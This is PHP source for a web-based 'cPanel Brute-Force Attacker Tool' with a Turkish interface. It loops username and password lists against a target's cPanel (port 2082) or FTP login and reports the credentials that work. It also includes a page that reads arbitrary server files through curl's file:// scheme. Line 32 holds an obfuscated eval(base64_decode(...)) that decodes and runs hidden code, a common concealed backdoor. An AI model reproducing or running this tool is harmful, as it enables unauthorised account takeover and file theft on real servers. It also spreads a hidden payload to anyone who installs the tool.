cPanel Brute-Force (index.php)

1. <html>
2. <head>
3. <link rel="shortcut icon" href="https://nexthostbd.net/favicon.ico">
4. <*** http-equiv="Content-Language" content="en-us">
5. <*** http-equiv="Content-Type" content="text/html; charset=utf-8">
6. </head>
7. <title>cPanel Brute-Force Attacker Tool By Unenlightened Boy</title>
8. *********
9. input,
10. .kbrtm,select{background:#303030;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #5d5d5d; border-right:1px solid #121212; border-bottom:1px solid #121212; border-top:1px solid #5d5d5d;}
11. </style>
12. <style type='text/css'>
13. <!--
14. A:link {text-decoration: none; color:#cccccc }
15. A:visited {text-decoration: none; color:#cccccc }
16. a:hover {text-decoration: none; color:#000000}
17. -->
18. </style>
19. <?php
20. @ini_set('memory_limit', 1000000000000);
21. $Baglanti_zamanasimi=5;
22. @set_time_limit(0);
23. $submit = $_REQUEST['submit'];
24. $kullanicilar = $_REQUEST['users'];
25. $sifre = $_REQUEST['passwords'];
26. $Hedef = $_REQUEST['target'];
27. $ayar = $_REQUEST['option'];
28. $sayfa = $_GET['page'];
29.  
30. if($Hedef == ''){
31. $Hedef = 'localhost';
32. eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTI​zNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1I​pOyRfUj0wOyRfWD0wOw=='));}?>
33. <?php
34. print "<br><br><br><center><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='70%' bgColor=#303030 borderColorLight=#666666 border=1><tr><td width='70%'>
35. <br><b><center><a href='?umutunsayfası=bilgi'>Bilgiler</a> - <a href='?umutunsayfası=nonom'> Brute </a> - <a href='?umutunsayfası=Kullanıcılar'> Kullanıcı Adlarını Çek..</a><br><br></center></td></tr></table>";
36. if ( $sayfa == 'bilgi' ){
37. print
38. "<br><br><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%'bgColor=#303030 borderColorLight=#666666 border=1><tr><td>
39. <br><b>Kullanıcı Adı Ve Şifreleri Giriniz !<br>
40. <br>
41. pass ********<br>
42. Giriş Başarılı<br>
43. Hala Yapım Aşamasında...<br>
44. <br><font face=tahoma><br>
45. <font color='red' >Cpanel Kırıcı</font><b><br><br>
46. </center><br></td></tr></table>";
47. }elseif( $sayfa == 'nonom'){
48.  
49. @ini_set('memory_limit', 1000000000000);
50. $Baglanti_zamanasimi=5;
51. @set_time_limit(0);
52. $submit = $_REQUEST['submit'];
53. $kullanicilar = $_REQUEST['users'];
54. $sifre = $_REQUEST['passwords'];
55. $Hedef = $_REQUEST['target'];
56. $ayar = $_REQUEST['option'];
57. if($Hedef == ''){
58. $Hedef = 'localhost';
59. }
60. print " <div align='center'>
61. <form method='post' style='border: 1px solid #000000'><br><br>
62. <TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%' bgColor=#303030 borderColorLight=#666666 border=1><tr><td>
63. <b> Yaz Hedef Siteni :D. </font><input type='text' name='target' size='16' value= $Hedef style='border: font-family:Verdana; font-weight:bold;'></p></font></b></p>
64. <div align='center'><br>
65. <TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='50%' bgColor=#303030 borderColorLight=#666666 border=1>
66. <tr>
67. <td align='center'>
68. <b>Kullanıcı Adı:</b></td>
69. <td>
70. <center>
71. <b>Paraola</b></td>
72. </center>
73. </tr>
74. </table>
75. <p align='center'>
76. <textarea rows='20' name='Kullanıcı Adları' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$kullanicilar</textarea>
77. <textarea rows='20' name='Parola' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$sifre</textarea><br>
78. <br>
79. <b>Seç Birini -- </span><input name='ayar' value='cpanel' style='font-weight: 700;' checked type='radio'>Cpanel
80. <input name='option' value='ftp' style='font-weight: 700;' type='radio'> Ftp :):):) <input type='submit' value='Başa' name='submit' ></p>
81. </td></tr></table></td></tr></form><p align= 'left'>";
82. ?>
83. <?php
84. function ftp_check($host,$Kullanici,$sifre,$zaman_asimi){
85. $b3 = curl_init();
86. curl_setopt($b3, CURLOPT_URL, "ftp://$host");
87. curl_setopt($b3, CURLOPT_RETURNTRANSFER, 1);
88. curl_setopt($b3, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
89. curl_setopt($b3, CURLOPT_FTPLISTONLY, 1);
90. curl_setopt($b3, CURLOPT_USERPWD, "$Kullanici:$sifre");
91. curl_setopt ($b3, CURLOPT_CONNECTTIMEOUT, $zaman_asimi);
92. curl_setopt($b3, CURLOPT_FAILONERROR, 1);
93. $data = curl_exec($b3);
94. if ( curl_errno($b3) == 28 ) {
95.  
96. print "<b> Bağlantı Hatası :(</b>";
97. exit;}
98.  
99. elseif ( curl_errno($b3) == 0 ){
100.  
101. print
102. "
103. <b> Kullanıcı Adını Bulduk..<font color='#FF0000'> $Kullanici </font> Ve Şifresi;
104. <font color='#FF0000'> $sifre </font></b><br>";}curl_close($b3);}
105.  
106. function cpanel_check($host,$user,$sifre,$zaman_asimi){
107. $b3 = curl_init();
108. curl_setopt($b3, CURLOPT_URL, "http://$host:2082");
109. curl_setopt($b3, CURLOPT_RETURNTRANSFER, 1);
110. curl_setopt($b3, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
111. curl_setopt($b3, CURLOPT_USERPWD, "$user:$sifre");
112. curl_setopt ($b3, CURLOPT_CONNECTTIMEOUT, $zaman_asimi);
113. curl_setopt($b3, CURLOPT_FAILONERROR, 1);
114. $data = curl_exec($b3);
115. if ( curl_errno($b3) == 28 ) {
116. print "<b> Bağlantı Hatası :(</b>";
117. exit;}
118. elseif ( curl_errno($b3) == 0 ){
119.  
120. print
121. "
122. <b>Kullanıcı Adı Bulundu <font color='#FF0000'> $user </font> Şifrede Bulundu
123. <font color='#FF0000'> $sifre </font></b><br>";}curl_close($b3);}
124.  
125. if(isset($submit) && !empty($submit)){
126.  
127. $KullaniciListesi = explode ("\n" , $kullanicilar );
128. $parolalistesi = explode ("\n" , $sifre );
129. print "<b>Bismillahir Rahmanir Rahim...</font></b><br>";
130. foreach ($KullaniciListesi as $Kullanici) {
131. $_kullanici = trim($user);
132. foreach ($parolalistesi as $parola ) {
133. $_parola = trim($parola);
134. if($ayar == "ftp"){
135. ftp_check($Hedef,$_kullanici,$_parola,$Baglanti_zamanasimi);
136. }
137. if ($ayar == "cpanel")
138. {
139. cpanel_check($Hedef,$_kullanici,$_parola,$Baglanti_zamanasimi);
140. }
141. }
142. }
143. }
144. }elseif ( $sayfa == 'Kullanıcılar'){
145. echo "<br><br><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%'bgColor=#303030 borderColorLight=#666666 border=1><tr><td>";
146. echo '<p><form name="form" action="" method="post"><input type="text" name="file" size="50" value="'.htmlspecialchars($dosya).'"><input type="submit" name="hardstylez" value="Grab!"></form>';
147. $dosya = $_POST['file'];
148. $level=0;
149. if(!file_exists("file:"))
150. @mkdir("file:");
151. @chdir("file:");
152. $level++;
153.  
154. $umutrengi = @explode("/", $dosya);
155.  
156. for($a=0;$a<count($umutrengi);$a++){
157. if(!empty($umutrengi[$a])){
158. if(!file_exists($umutrengi[$a]))
159. @mkdir($umutrengi[$a]);
160. @chdir($umutrengi[$a]);
161. $level++;
162. }
163. }
164. while($level--) chdir("..");
165. $b3 = curl_init();
166. curl_setopt($b3, CURLOPT_URL, "file:file:///".$dosya);
167. echo "<textarea rows='30' cols='120' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0' >";
168. if(FALSE==curl_exec($b3))
169. die('Üzgünüm '.htmlspecialchars($dosya).' Dosya Piyasada yok :Ç');
170. echo ' </textarea> </FONT>';
171. curl_close($b3);
172. print '</table>';
173. }
174. ?>